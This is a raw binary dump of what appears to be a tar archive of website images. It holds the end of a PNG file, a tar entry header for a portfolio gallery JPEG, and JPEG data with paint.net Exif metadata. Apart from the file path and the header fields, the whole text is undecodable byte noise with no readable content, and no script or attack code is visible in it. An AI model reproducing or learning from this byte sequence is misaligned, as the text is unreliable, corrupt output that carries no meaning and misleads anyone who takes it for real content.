�}��	Ųq��ـDN�TM�֭!�tvv�̝Z�������-s��`�:|ׁ����ӧO����Y�%�,�Css3��ឞ�g�}�3q��^��jhh�mL�ੲT�?��_�]�J�x������G?����jCMm�)�J��w�k���@��}n�f���v����g���|��|>�f͚���+���`}e�Y��pi��P���
�_��ׯ��=n�X\!Ά�֬kR�8$���v>}v�B�.X����p�Νw�u���00��|��ᎎb� wǎ��{/�8/o���<n���|�t{���������ũ4�ivEA%Όr���pI���o���l-o߾}߾}U���݋��*BCy��f;v��_'ނ�r��|zrr�.��<��n�p,��j](�s��N$�P�\�ث�I�<yI��=!N��L�
�0��y�4::�QJ�B��E奨)��f������gv�cӞ��<�'M�E��*�������%MJ��\!��ċ����?�H�zX�$mJ92U�0���<�\6�J����H
W����)l�]�LK.Kd-�/J�lN������J9�5��,�j�(:D���[�p:M�l��K�o��ܚZ%b���.�#����a$�ė��eX
�Xլ���]�v}��_�������t�NR&����1n��ߏQ!�G�c����Դa��Fh�����3Ć��5kր�p�
�m۶-[��
�e�={v���~�dP`rDQ�<�����������i4�>���۱X9I�w|�����P���oii���U�V�9����N��x<�ӑ�#A�|�_��W+W��7C���<�vn��f��ѣGaz:t������®�.��>�����C=�������7���S�yu<��ù�9��<�w\.�z�O��I�N��;�[�;ڊj���Q�6]�&춉6��s����+�m�q���[Y�}��\8�	9S����t>�h��r��f�r�z�O���,��d,�L�#�����e(��
R���s��R!WW��n�R!3���H�A\�kz����Mw�ɭ�?��O�!_|6d'����[g�nݺ��"��U��ԓE#�X�v�m�o�FEȀ0j��/.]����>Ⱥ�GY˗/���x�!�e����֭��� �|��AP+�d\�>����D�����@Ã��hF��� �h�H�¦M�H�[4�q�F�G	����H�իW��ԔO��`4�l0z�������t��6��&�A�Fs��.v��3KK�O�c�\���Drp��pzl2~B�M:/�f�-��I8\A�î(EMS�)���:Sv����x�����R�(���D����
Ȋ���E��x^��[�a�L&m��,
s���B�#�3g�!0�(3��.9�^�(ŧ?q�D�\0��*���}���|�;Us���ر�L���R���O� ZT|��gDQ��
��g��$V�XQ5�����"t�G�P
�̹G���=�;V�֮/m�UՊ��&9Z��;��[D���ع��A����ed<!G�>Ҝ.�\�a���4e����Y�f��,%���B}$"
���nu��P�b�5�Ԛ��
��㩬�܌*Ҳx�tuN$�OѴų\8��\)�i(��~t~^��K]�y�KL�O��>���9�k�_�~�\��s��e*}lO�zK����E�a��lhF^�^7/d��X�+�s-lo��%%�����������%�D!ϱ"W6]�&p��BCv�9��%�\��E�J�2!XͲ fy�g��WӴ����mY�+�$��>�KȌ��TS+�*���)iq�����sۖW���%A�>]�B�$���g�U�3$
C4U�s.��]A�O��KM\�MovT��q��GO�9�y6}�df��LT�|���U��$M+{c���q��yFS�ΟM�P�J'3�H��\"Û��01�ls;t��c�D�(���ҩB{��]X(�,3WRT������`�R�u �Y��B��+�>�+l�A���8tfx"����,+�e8D1�H�G���h���\ʚ#��b�N�n�� �E�P$�-���������-����G´wuu���{�w�ލk���ܡC����9sb
�0n�
LY�f'�ؕ+W����<�s��/�Fv��M0S��BP�������G���I|���FP\Qȇ�	e8>!XCSS�B�ݷo�-ނ�F"6�{�9�P��ߏ�����+�,[�<�*@��h<��#xk{�W�=ĸ=�;�e/��49>��z�wrNWa�4344���jS���i�A1ұr��f㣪!���5CN��QL+&d��u���2����U��"�[�T�yZ*鬚+X>�s�@yv�p
�m��FG&R��ܸ�c�Oۺ��	�h�������[2/E||�^�/'��zh�����S�N@�G䒃Q���/�r�?`��.Y���$B4� ����:Dk[[����h_�^&��/8p�w9r�؀O`�����C�4�,Lo�n��̦M�H(#�$��ŋ��n�A�P��o����;`�!�9C�0��a\�.�E�
��_<Jw��xz6/�.�>�[-�4�j�M�Ο���P����g.�D��-w8�5v��;��Ա&��#r֐Jkj>��M���|4m��L�Wu��J8�2钡�r��\��X56�X4|��ϥZ�
�oA]�X*�8�4���ww.���*�C�"k�s��^����я]\����p��XW��}�?��)�c$��hsr,�n�-�����,S�|�f͢�_��9�{Y<[�W,N�CcŕA�bف"��B^���.�w�0�qBSC�����E��)�M�T=��gFc.�2����$���1F��nQ��~�7l�]�Z�+G�c˝�C7���林�z�v�m�͜
��/����ӟ�t�,�;SgϞ��b}Tr!!~�_@A{衇.ɂB
,|��ߟ���OB�#�����n�����~���O���q��d��{*]�B�]^������J�M�(�H���e� �פ�)��~��%9��G�v/ka�[�!Ky����6-:���]{�C��X�q�lR�,�3^�'Rbh��C[�I\3d�h�2
��T4�r!YQE������*��1m��a���������j���v��Yi�q�i�}���i`i6�lV����r�3��8s�����/��pIZ�p!,8��s�/�i~��u�l{��:iZQ/_��&��KӍB�h���^�aX�찋MZ���?�\����Z{�?45�J���x*�Qu�ei��%Y�X(�r����T��j�_,*�
#��`a"-Mv%L4mjOY�La�@kxtxz�9�lk�$AWtg��.wCܭ[��HՊ$�K/�4���"����Y�"t�_|q���ϡ�<�.������~�/�$�<��a_���hllxxh�\6[�]*Yg��>ӲhC�QQ
��gT2�EZ-/
B.y��BosS��3Y��
��՚N{�S�����A���ľ��
k�dž5�x&���Vk{GO�@Cゎ�H{�a�Ng._#@�7���뷟]O���xݧT*m)Ϛ�WmL��RA*f�����
�s�L6��Q5�23='/l�q�(�F"��	��y��d�|8;dē���(D%�1}m(�r��޾�Rd(��������f�qqQ:/�y��
�ׅE_�,��@�틂�q{��e�{���'�^�|��+�&M�$"˴���4��	
O깬T�`Qz���ꥼ�eW��M�׀��G����R� uo��omij�66�拱+�fszC}��Ot%r��p^���LE���b���ZSYS�T�7K�0��&�xV���f
YO��;�%�4j^,P�jZ~C/Y�ə�~�9D�lY�z��)�^�SXsZ�_�}$
�<��t�P��λ�G$Z�K�5~='����ey��]��n��"��I��+�%J6̐��J��l�\qC�O����15`�
�	ն��'�:E�.تh����1�o/��;E��i_�Г/$�h����sC��QO0��n���wL(��e�h�3)���=791����3�"K�J�,��6��ⓦ������JI�[oKk�FN��ۄD6���ȅZ�/ij�v[���.+��b��󎐇SF	��T2��JE�<6�9���������΋B*}��IQ�n�����Z���{)���&45�:;���Ɇ#��1UVy����RE����!ii�?O�a�,2�c�w��,�}�ǪΕ}�T1ܷm��+�8�NH�]�vA�{뭷�/_�����g�%����'''M���M?O	��k��Y��w��F����ǎ#���2��������FGG�~�ca����h���1/c�֒NJy@MsK�2�j!��S��J$�M��A��
��b�fw1r���㋄9������h2��&2����ΰ��2&e��f�pk���A;7�[��u�
yEf<k�N�j�g=�yC��E��8�R�דz�X�_�j���>UC�-RS'������Ν;�����
��}ꩧ֮]�F������^�"O�:U,�9�����z��"�����իW~��R�컖�TĀ���;�ɭ4����<x�,�U��I|������|�jJ U^�!|y��J�+��;p�������d2���۷t��ھ}��ݻ��\3�˵��J�v���O�Oʲ�ꫯ�w||���z:�F�V�в
-�
��в��-�����S�mֆ\�H}S��ݽt�º-��u.pm^J��Z�P�h�i۹�䶗�N�J�B�
ȴ��C�|�b_���]��s��#�6�����ío?�?�{l߻#��ű"e�1W���s�Ta�b��mFGr٬�,�}�i�RpE�
��Z�h�"ࡶ�����e }�%�`��	T��B\2�R�8��7�z;�U�HNt�<��;gϞ����v�#���f;����-$�7��'�1OOm߼y3D�Hnnn�cU_��x�x<�� /��@ ���[SS�q��,Y!�
�V���vP{��
��f���_�eź5�}e�Wﹱq��͍ç�o:����c74SM���Nj�����@�s��������/�1���h8�!�v�3��p8�-V���_RLIQMڤ
���D�Zq(s�)K��%�?>2�I�J|� ^� �c����d���BV].׷���Kv_`| ~GFF ����[�◿�e�K�ѐ�Tyexٹ��U+B�BT�Hr�E ����K����A�W�5��_�>��o�B���y�������,�l��>��X�Z��<�d"'x�w8�����dG��,�X�q<_�"�R�c�Ʋщ��u�mK�T�O���%D��ր2e�E���d)z?싦�P#�vV�YV08��M5�x�G*�t*�-�^#�M:6���fF�5u�X���F3B,�~���{�	�	u�=���by�� g�A�髩��z{{�^R�T�S�>U~������(�t�
d^J��p9��Xq3Ti�8���b�җ��OD7`�D=���9�-ͯ]qv;��l�y~�k���vF燇��E����,��˦�����_'bw}�a���'��ƌj��Ć��D�x�ӹL�k�f)=�D��޹����	��k��+|�`_]�7i��D�x������z.�
�rNEg�^^��)�m�-0�
�l�(
�3��N�O$(C������ھ�
n��'��*�"� ���u�q[������U�+H���{��ak���WLg+���DA)���F�X2}hס[675-:8f�k\N�l�ɥ�R^)J�D������6g��Q��k��H�*%��!M:l�'�Fi��4�7�2����L�r*5$	A�;8�?ĉ�&�,
���f
�HK�%G��lY�a5��P�j�ʕy��"�_��ߟ�4>>�He)�W5�bS/���Y&��h.�������s�b>����]t��NQ�\As8l"l
�+�ai�/�֤��24�\,���ô�[����8�m�6iN3Y�RX��L�fx���Ŕ�Q�����)�(sq2֓�q�*j*���)VӲ����ӟ�b��?�gv�����O����"'IEND�B`�featured/images/portfolio_gallery.jpg000060400000157210152434416630014060 0ustar00���JFIF``��fExifMM*>F(1N``paint.net 4.0.9��C��C��,�"��	
���}!1AQa"q2���#B��R��$3br�	
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������	
���w!1AQaq"2�B����	#3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�����������������������������������������������������������������������?�6�8T��@�U��U���@j�P��eG��s�+^;h�
ʌG@{P�H%]�H��*^�Ћ������ ڇ�<P��|#�_k�O�<�w�*�-�v~�φ��o�ﮤ8H`��K�#�$�ן���R����ϊ�?b��Y��M{���R�d��ds�}e����y������z�t�)��e�'���e_�.}C�ž�b.>�yqg�\O,HyVc��BYp�\�&p��'�_�e����#�H�����P����_�k�_�g����_�t�)&��5����,�1�c��3���E������}՗�j���v\�߅}���/�ֿ��E��t��>|5��k��r�[������C�
ems���I�%��zׯK�����i��_�o���?f_�:��<M�H �z�����y46�ǿ�x�UT��NH�YJ3�o�W=�h��H��s�W����'ׇ�/��Q��>,��|��:��
þеO��-�E�ޓecur�M.�;x��ʭpтwc!N:���(5���q��~O�h�</�+ǟ_����RY"ܮ�&�4˫��-��a�30K.���Img(F�`nH���V�Y��癲Y�,���?��e����|Q��k�]��qh��q�	���t:�x�G}�6�m�
'dσ$��Z��g�|�Wͦ^鄓�0�}�
�@=*���:g�yu�0T�>R=*���#�(��Ax.��k�o�"���x��
��"��Ze����|IԢ�4�B�f�UU�сn��_x�
5��_=+��#%���U��*�Vض�u��x?�t�Ӗ.	ou��9��2ڭ��/ɟ�i�~���2����K3e��}R���]��<s�~�b��𭢷�p��_rx{�v�,v�FY�~�s`7�����b��_7�U[d�2�Z�2�e�`��'x��?��eY^e�~�ݗGv~G��y�r�5���
�6�r7[���GY�ϗ���|<�u̷�
�	g�c��]�.s�^+���4��o-e�+y�;���?x;0�+�|7�?�.(tĽf-��C6�y�׽U`�*<�>���'�e�g��Nxw�íb)o�Ømn���j�t��C�#�C�_�`>|;��I��6.{c��x�3���,�mQ\���x��m3�<��l-|e���?�
72�qK�!9xX;&�1�7^�k��S�
ܵe��c���X��ɴ���dx���U�k];�o�&ċ_�|͎����g�_9�u�;A+�����s���t�6���^�Guh��ij'p���Yz-��Z�6�p��%��wzzs]�lM<5?v;u81:�����C�sR���`���׏��Vߧ��Y���ǀ.L^_�_	��܈�#l�����
�!�P�4���ƫo��?�}�gx7�Vzu���Y���d�U9��~����y�u2�AYb9y���>~�_����xB{獞+k�	[,1������޿������bin�a��zw�M��N���c�#�n�#�zU8�����h�����w�a�e��_���~��Z��G���?�g�x���� ��)��������浪c�	[^���X)ԍ��w�?�-j�&�����L�R�@�Ԑ:�W�~��t�J��GЬ-u+˔�M���4Rw��`��n�{��H��|w��$׷
=�[�$1�m��yݞk�?�_����H"y|9�i�ɑ¨�\����8(�j}d��>>���Q���ŧ�t�8n'�X�g�v�  ������G�%����-�Z\�%�H�f�&�M6��m����_���I�,����j�PM7r�r�^��i���t�m5�-t��t<��Ձϯ�[QKb�������j�����P�SN�!�F��j��=q\W�_���i�xsM����g�FQ�ಝ�ʿ`<}��K�K�ߵ��ϧ[�X�1��c�r����������LRX�����u��Țص*�>!�f/��O���F[Q��c,3�m|���k�c�s���-rKd]����~�jZƝ�
:�%�l2��(3�8�\𯛼o�O
�}N�9�탥���.�0���c*)�)JQg���a|�6�HnU|�k��z����W��4�y�7D��*s�~��G�#���إ���P�+3�'�����:�¾/�����	"}]%��0����p��E-��Ud�n��7?g�o��'����^Z���&�4׷�s,rO"����z`W��W�W�5��
7L�f��j׻|��sJ��f�,ۗ�T
����+h6�W�Ϗf���~	��dh��I��ҿ|�-�B���
[�.��Dd��k?5Ƙe��Ռd��Hx�	/#���Z�������@�S*������Vi��~*|<����
K�˭�M�x,t�"���[Y
�#�=�����_���?	�r�W���hv���}�yk����:��	������o��'��yu{�?M��U�.�ؾ�n9��$��W�%�w�d~ռO-��������bo��ڛد��8���q���TS�;���>���J���G��o�o�6��>�/m"g���'k���n#�Un
~q�\�?��^,������E����<?�h>�L��l�I��eӎ�W�yo�XYI}-���dב6�
�Arހ�O����Mm���_�Rד�;[�I���ەmǡ��;
�y�"u�o��O�;5��E�o���-��+��t�Y�~�kuiq4r*�q�d�_=���f��O6�F�t��M.6�p8�����}���g��U�?�[���c��<դ�t��b����@鞘�2�~(���6��_'Ï��q����n�ñ?s�9⽸V�Y>fv�2��ϙ���4;�-G�zo�5ȯ#�!�����_9h�� ���x�ᖯ��R�ú���	!��l�\�%�y�9��o�������kN(�VE�%ܗ�\pRU?7��>/�/���Q����|Af%��BN�����R���٢�֋��ψ�����<5>��"�Z�v�e�dž�-�g,j΄0�ݏ5࿵Lv���ό7��+|9�f�:?��V�������+p0{� �F�kxz���Ǟ��pYɼ�"c�:�ߊ�����'�[���u�-���[|7֞�E��R<��s"�\�#���0�,L}�W�]lv�\����?Q���zb������+���N���4�����DgsA�^E��C��+}��>�7����I���ϦF�vA�_�޷��)��GN+��M�,n�]]�S��ȣ��k�/x����pj�A�>�eH���P�����P�g�4_�^�Džf�ſ�^%��c�
WV1���22�$(�nueev�}�ি����|\���bO�����9�r�K��}�R��C%�֍42E,h�S��"�XY�w")to�2��^��7��v���ym$��k�����mq4H5)�#�?o6���nh�n�
%�σ_��/Z|0�2�|�g�~%�9�������v[��u�5��ZO�T���Unq���Z��q�;x��g�~:^����$��k����}�ǭ麶�
��؍3�	�@�
��G�~4|W�׀��3D�ӵC3�6���es�k�/�?>'��io�������]:m��-����|�{�O�g�?�o����>;xg��ůx��w�ۗX������W���o�L�V�L�f
\ȁq��:|D���|K���s���|!�x��W�f��#F�e{�"������t���V	ZKyL�ʁ'I��*H�'�K����-4��?H񮃯jS���,r4q�rͷ����X�̈́%�|Q���nY�����x$���?ho����o���4���f�����<�ܗ���j����Ȣ�Ua�����v�燍��������(��@���� �G]�Ri�
�Џ.�5���ÿ��^[�=cÒ1��� ��h�k
i��q��
��̕�q����8�ʩ��Zxj�G�.^)I�ݾo��\H��h�2jH��E����6�9��G��ErOL�W���I��{�)���wt���K�L�������M"�(e؊8�'�+���/���-}��&�^9�o�X�4*m.>`ǧ\WnZ�Wۚ?��gq��\B���������|u���EL�)w~W��bH�#����?)�"��_��G[x�>0���V��
�Ȼ���s��5���|Ro����vF�϶Ч�~���YU�G�N
�}Ch��~&�6��i�os$1�_�X��'������v�j&I��[F?!���_L���~6��>w��H��̪���:�ߋĺ�*�_�Y���?�*����5�J�
OC��4�T�KS��)���1��G�OS���ݍ��׊.���M��6vٴ,�u����6�W#��j���?Ĩ�+h�|w�|@�P�J������x�n�^M�q�!�Lb�N��:^�ߴ��_j��6𦑧�^/[�v�9?ٔ���"E�$q_��>[|.���u_�&��/-�W�C��X�&e�PVE�s��#�mSK��i���������!��届���zwZ��/��l�_����>~�)������K��o��6�j��DȒE=�s%Ǖ��odn��B�l�����|�,����wn=A�������I�>�j��>"S�>*�q�N'S�uk��6��I6�~�r�cR���_iK��'ŭ*h��'�#́ܜZ�Y�o$��a��+j�~���|��8\\eN���o����y�;YT�K��r�6>���x�F�>B�"u�����}1_�z��_��A�9n�0�^�	�jIs����f[�?Z����jCZ]��E�y�,���/N��@;dX
������^
in����jf]%�L����m��}���Y�?�@ڧ�_‡��ZLj�hO���lQ��k��������7I��#18�=+��O�+����T��j���}���r3�c�� �8�3��L��;|J��^�~���彺��Ɇ��Mb��`��
�bp8�X�F����=���qu�ݬ�V��϶~�2����Γ��}���+o���6���f� �X6���9��H�䅿xAe�Q� j�K��M�4�Z��L���?�����~
�|;�C�$���̗L���Y^R6�;qۚ��c��6����Sb��ɵ�x�'��c܄`26J����5�3�=��?���~)|h�,�[�Så���o2\�B��=�ۼY�S��$�M�}7�%�@������{W���J�P�5�D�����.��o�=E���I��;0PT�6�N�0q�q_�I�
O���M��b���xӟ��⠪R���9JP�J��q���({���]U��~3��

����h^�t��Cj��K�˷�U"�����y�־��>����{�o�_to��fY-l�2��5m�U�`3&�IbGP+����E�~���g�ߊ-�Oj����s�ެ�w1m�\���*aJ�_q��I�g�����Ú�������+	�_=��-����|�`��.<񃌲�)`�8S��Rv�m�M�v?���¯x6��o&���j�
|����|�_D���S�~���↪5�x����+K��h��F���#�l��sȮB3K���O"mb-��u(#`%��� �+ᯄ� ����;�ȭ��|]��d-�&�Ɏ�p7�!FϪ-~���iS��X��C�ʻ�dЏ^��E��b8���Z��X��{��~�����ƕ��5j�)�e�O���t�r�Z���R�Ci:��xQ�F�|���#�:�W�Ҽ�\;����ң���}{��]�z旟�em�w�m�2����Ny�~||]�A�$t��I$�e�q��m�c�s�+�%+��FI�J�|k�|q�妖�ط�4FL�y1�^͏���Od��
Y�\���e��WI�?��5��ci7�u
D�7dzo`v�(�S_������|�/N�Xj?|��\�i����V�j�%[�a�2O\W��o6�Fg��v��_�9c�ֿ$�0J\CR��Z�r�w���eP���~���_�I�Z	+�Vq��k��l��M������u�ҿ���tïx���k�W�:4mqt��n�j���Γ�q�J��oBOs���njo#mB�C��5���[̸�	��\�q��+����:�G����F�P��)�I<;"�q���G��(Q$s�h=��9;,����q[�_�=�mG<O)�w��A���xsJ��i�+��է�Ӛ;x��^@�+.��v�����_�������]�ng�?د�Y���̆i��I[k7_�������K�x���V�٭��.��E�g[��v�	K<�B�ɒ(�RT�<d��w׀?f����-#E���7W����x�L|����[�ƀg!v�1��������u����U����:
�K�2����:���-�*3�G5��n�5�0�=:p���\`��?ƕ�3�|/�0�Wk\�B��ޣ��F��\����\�Y���u
�@�[F+�+�c�I╤h�$]������Ǹ���eO��U"��C\je��I��CL���'�6�c�|L���
��Uﭔ������h�z�����,���`�E4��ڋ�����yQ��U��[Y�X��������HVݞ�=6�������|Q��x��-��٢��>dU9ϓ�|�2>V�s�⽪xe'�i~�c�b��=����c��x
����$��#�q�z�޾��&�O�?�V{H��_�
����˹z�z��
����<~�����V*���G���۞�0=�[�q^]�@kZV��/��M���_���;H&�u��Y$7�Ú��T��5mQ�'V�)v���jZ�����!����
�l��@��g!���=�����M��~�t�%��+���1'�q^��o=�%���Km͑�jq�����!�љ?ӭ2}#����dw��~ϨZ$�=����P�x���4Y#3�t*[�`�k��7�h����r��m�0o�gX_j�D�S�~�J$�>J�P�����νh�h$9������>#���ּCk�-��%�>\�`9��:s�	⾧����iq�h>*�
��Vվ�aw-���,�e�V!*X�	�9��1���;L�k	/uX&c#��F�q����y=:R]۾�bX_�S�-ˍ����7��k�R�_٫m����0��
5V�;�_�����>���ޛ�q
�rɪ�#[�8Vu׸uʲ� ��*\DVD2�G�u%#]�,��j8���7��U)mna!�Q�����!S�?J����9sK��#���Ԫ��Ǣ��A�߈�+�č�{���O����y����~�kN���kʱj��^��g|,}�Q��u�"\�-ݑ$pR9��R6�O15"���w����6����Ta�InS�z�.��9#�yݖ���d}^١�^IJ��l��L����a�����˼����Js��@6O8ƻ�����_�o«!��'ŗK�[��s�xz�d��>�����W�����P�y��,�\)�~�5iG���1���џտ��4�G<R|�;I��O��}9�_�oo$�5�•��hv���g��_;xγe_*5���T�N��<��G<�j��š��A I�>[�,T�8� :�Ͻ{ՙ�xx$z��<�Z'ۥX&(Bڼg�{����s�uO�?���B���Ǡx_Ö�[�NK���c�2�#3
I<W�h�7��$�!��gt��:�������l>�*�-���O�n/n��%��lm��+������:�t;gZp��"���W��?.>|;�o����0���{��k�x�d���,aN��
~=�J�H��s ܼc�����V�k��ʶO5<�F���1�z�8�:q�/waҩ)������k5�]���O�O���
�����+�loa�[ٮ�$��X���܇*ds��v�e��w���_
�R�|mw�i�5���7��"t"Dp���M6:���T�5�񏼽�W�?���ě�x��k�]i�.���}���43X����c0
;Si��ǟR3�7SV��/��;#�Y����=CB��܋e;�2�yrnV3�k��a�!��
��������׊��Q�>�PJ�M<�s:��� 3�rr3�:�+�/�� }*O�G��6s�_���g�u_��@[��T�*8�F���7�t�>s+$&�3����~N|2��M3ƞ1U�9�����/ۑ[�ԧ�C
�1�_�:����_O>�����ԭ�~I;x_3Q�z�$v����VZ�O�sO+��⧈I���V�ћWv6���m)˙\�4�Ӕ������Ķ��Z	`{�����e�y�ӟ¾����FKsf��%?�N}+�/�W�#q
�Z�-��j���{o1�������u�+W���N�4������9g��w9JH��ܺ���]Zͦ6�w�EunѴ���8 �s�_����]��Q�.mZ���;��YmZE�M��:yy^��k�+�5��!��6_�a�#X����'��������9�O�k>9����S��J��i����
6�R�Hq�	?O�<e��χaSO�T�+���^��[���,��3�]*���J
���g���w���A���|�!�/�|ۊ����r� ������M�~?��š����j��#�T<��k��C�y9�ϣ�����;>�⟇_<�Sq�E����������q_~����<@����V7b)Yb�ӯ�`�$�.I�o�5�![���?�U:�Y�s-��Ş9�Y�o,w�W�9nڽ����?/��j���yyo�\���c�b��`ay����F�S� �[o]����u,9<m��_�/�?����<e��21i�x�/��BKA$�f��b��`���_J��
E�=���
��q��
z��8%Ùh�$��ž"����"�".�Z/3��ƾ2ԍ��o���u�>��j�_ⷉ�n����w�.���+Ƭ?nx�&�S�Z95щ_�Mx��?�i���d��Y"v�ߵ}���q�O��F[�]�׎�G�%�O_��s�bN+��.h�DoEo��+�~j�S�u����鱩|�̇�v�_Txᇉ>3��rZf{	�mN��pE��)�U��W�f�k�'h��ظF�ħ���C�Aۍ'��>.x�V�Z���:���P���<��Px��"�l|m���r�,��-�鶋�[l�P�k{�x�c����U݀O�c�xJ��o����
6m4_i�f�g�\�5ʴ�Fq�D�\1a�9��~�_��J�[L�S����6��K�a���F�l �5�NuC�Y���f��;+$����C���|$����׶6^-�yykuggp���i�FK�YNv��ݐds�޿�A���������C]r5����n$i$�2�f�v2�(I�A��+�{�����B�愭m%���ź���2.G�f^�H�8-Զ=��i�/áx��Q�{�O��ѽ�!Hn˞��]9^S��NR�����}K�r�[����u|/�K�{��o�bf���xWZ�'��.�d��;J�/'j�#9�����sBaD�-�y8d��~��~I��c�w��sjZ��;;>m?éo;a������I�M}��˫�=���Q�٢��2@㑟���e��tҧ��#9�a񼼎���_߻��Ȓ%��L� @ѫ`|��ۿ=�pZ��4��]��3�m��<t����1q�}�w+8�k	���\�$�9��u��K��!���y���rC��ҨJ1�>f���ofy���x�p>�	M/\1��B���j��8?2��Ҿ
������7��~m�oj����2�g���Ҿ��<I%�KmK�[>tl��F�O��}q_2|u���>|M��eX��Ib�7*ʶ��ʐy�c��SFkMYիO
(�uo�E�c�մ���|��go.U9���Y7ZM�6|��t�b�g6�b��J�C��e�*�n���a�ֲ1Z�ق�u�G壼'�x��#�:=����M ��-���rB.X�sY���q�4�CO�`�!�l���+�kk�<)��T��]b�^�����Y��O�O#JgQ�&S��x�<V-�������CR��u�Y$m���h���M��ٍ�$�f6��� �g�_�6_�N�ٶ��[�&��^�'L��=��ݝ���-��{�]E�J����C�����?�߰����<�䪲���>���gŖ6����Eيt������3`�"?:}�]������i'��>�~���>$�[�gO��Ə�6�}�t�L��D�fl������2|�~"k�����u`�
m�}�Z\Q}�O]�V֖�=���K�4�$�!Xff`��o�,m�4ܪ����,�zv�q����K��v��QM��bn~����C����xO��o�Z�ӟ
�C�e�M�+KҘ�n}�q-��;�fB�R#2D	es"�v����wH�?k/�^ �/]��X����J�h�47i7a�6.y�g�N�ķ	�'�X�S�R]���1^��+�m<'����L����wD�Wp�U�̧�▼�uck�_��u��Ǟ9�~�����_��-.Y/-��I�# �{mݳv�Č�'�|�4V2���H$S�:׺�x�_�sa�/�7!n|�����_ּ�Z���X��Ɓ����#�]��b���W����eee�x�#�?�uu�N^�2%"a�+Af��ͭ��v�pm��~S�s�9�k�I����6���-�-��u���.���g�o�j�~𧉮n5;m�d1H��YT�νXw�#Ú�hC{��T�Elyg�>�+��u;�9l��B4�'\�EN.,��4��+?찻WT�7���Z%oi�e��A�ǯ5��k�I���o~�gk��ko	�{s��k�?���D8�zַ\���]o^[���aി�\�O�W�;��4h��y>�קo�}k�g�
5��I�`��o�>����C����t�;}�tm���q&�}��F3_�:m��P��5�.�$u�MLqu�+��T,u�]�a�o	n�O�*�S퓘Ze�R5d�*�=�qeP���c�5��u�}1�\%��_�Y��f���E��9��:��\<Y�iڻ��d�s��N08�/z���v~�d��B�~)�3ƺ�η������I�Z?���̹�1���wѩ#*��d��?� ?{e?���_6}�W#�<�ΖB�i��7:v�jm�W=7D�0��Y<mnKt4�����_������~	�������=��������?��V���	��e��~�`ۿ�f����=g�q�+4k��"6$R
�r+�<Iᗃ�]�p:�D1�K	F��v��Q�����;���͒G�"�Ȳ����5��ϊ�>����E�o촭{ƚ�����bH��n�$e@!$P@'pH�5�6H̊rB����Q����?R+�땉��Ǹ�k����.�-�����s�~����_���MKF��#ۆ�-��Y�ҿ2�$�O�XS�?LqT�Lz��zW?z�9�\�O��a|'�7��A��1�އ�]����ksi�x?�m�2BQc�E���ś�c���~��c+KsH�E�^6��b?y�_��7SNI{������I�|��7�bBW�O��3�w�ia8���:W�tV>�*.�_�_��o�>���R�V�b��"�c���>.�wf���h1򕵉�^3��U�\}>�8���h�mdx�Y0v����AUG�D:nov}3�|c�4�����Z�[� �1Ӄ���K�Z
��A�J��N���5�2�ZM��Eu4�a��ݖF`p@\d���ãj���[��Z��m�������ϖ�V�6�w=s��_�V���_ZGko
3++�\z�������N����%�|sy=Ɣ��Zh�+8i��n��ǁ�|��B�Z�Z=��\��rl��`o%[���U��Guݖ�c�~]�Qc'�$�1# Fv����ch��j=�z��_��u(Š�y_s�����/éuۏ�?�}��*�Ca��L�ZVyr�Szzשx�C�=k�U����ϋ��隕�ƞ%�,cH�M�Kß��_���ċ	�H���t�w2�d��8�'�UA�ko�/�ӿ�E������כ���Tw��M�.Y�n��־��5���\7&E�~,O��>ؓ�b�;,���Voθ
_�
��#Sy�O�`W݌�@������M��X� [���;�0pv���a4mVQvb��%���j���>^��m�-��a,�1��_����
K�Q���?��a[H��y�WҤ_�)g�w�t����ZU���}��~u�vA��i+g�`Z���8�u���_�Q��Υ����אc�W:U�����q\��7��&�B��o/��[|���<W�UK+�����Y�->������0��^6i�\�e[,�=FE�#��w5��>��~���+�͎��n��^Y�60,&Iax�g�1#�H�Gj�Ԣ�9nDk������އc�xm�LMs)�������zׇ�%��K�j����r��N��S��!jnbA�O��N7�y������?��Q��+��s�uK-&����
�;}�ҁ�sw�Uu?�:mޛy��2�����6��WoB�y?N+�6ٱ��.������\��ԃ����{U�����x'�?��|B�uo�W�����i�V76��֟��*(�v�B���G۾���f������f�M�~ �
���[�{�~���Opu��s~��c%���1���ٙb/-��2�o�����z���#T�.�=��)����U-CƑ2��Hi99p@ڥ�v{����0~�w���o~��|+�˥�[��mIl����1Exшbhl���y��y^7��j|���g�Ŭ�<1���:.����
'G�ƫ-�z/�]��gq%��,��d����]��[*�n$g��
=�o���5{�,�I6�!��M�k��4�v�LK|�6���{��44�@�]Kr]N�nc���Ж!%BX���=A�%��}��?������+�?��g�Ih�Zk>>���)��֙���TH��iY�w$0�a��`������7~ͺTȞ���	w�������bo;6����j<0�;4")�Y�c�UX��ލ��(��Mt����l��:dn�c��Q�>������p����Zy�^s�2�ܤ�7��N.ѳ����k��?����x�:w���HӾ&����յ�	md���[��(���X���nep�df�.��|�U@�\�?be`�N����_��Jt�2�%.�!#��V��+�=��T��'3$ѐw�=�������Ӻ�"����\c�*Z���2g�U��! �]Ͳ��t��>/�n��+���m\W����z;��_�ק�0��Be��U��0ٍ��,w�y�3���� �̓���Y�A�ҺK+pH�9�+E��߅v:d0\�R(���Cl
3��{�o�h�"8c@��^y�F`��,Wӟ��	׈!���÷
^常�'���Gӱ5������?�O}�;x��^��_A���4Я&I�o�Q����+Sk����/�"o�(�Q��e�,l�Y��������c_6���!k�_<%�ÿ]y7�ض��n��]��цR:��lx]��k�Z�>�p4�n�!�����aӮ�T����QG���B~'$�c�?�c��$�cHW���k������8�����<�Uf�-���(R1�� x~b�?��y��s���_�� ڭ׆~����P�MܰC�c���ׯz��/��+��3_k��ⴷ_�{o�!Q�	���#��X�:����|���W��[�����	�k������K������C�0��?(g8���v�`��ҵ�-u�>T���,��2��޼�6���?���V^�k_|I�*�6�+yz|Č��d���7.�����o�D�'�e�o��R9�8�
���� q��Đ0J9� ܲ��%�v?=<S���!Vp;f�GX����5��,�ep2���oA�_9kV`<��'���E'�85�]q'�]ơnw��\]��U��EPEP_�~
�g��s�s����|$o�d߄ڟ�-ú��}Z�ox�9�F�9yg���'�m%ĸۓ_���2A�w�u|�p�.*�Q�*���>u(��N����	�7��g%�%�V��ԣ���u/��3���W�����WŗWz�> �:����u�N�����c���������>�q�a�������3�k�lj.�?jzΕ�LkW���B�<vv:�?�v�kP��6��65|��!;��Yw=Y�ի�[�W�m����V
xoI�4	5MN�?���7TԴ�f_�Zi�\-ı�$�
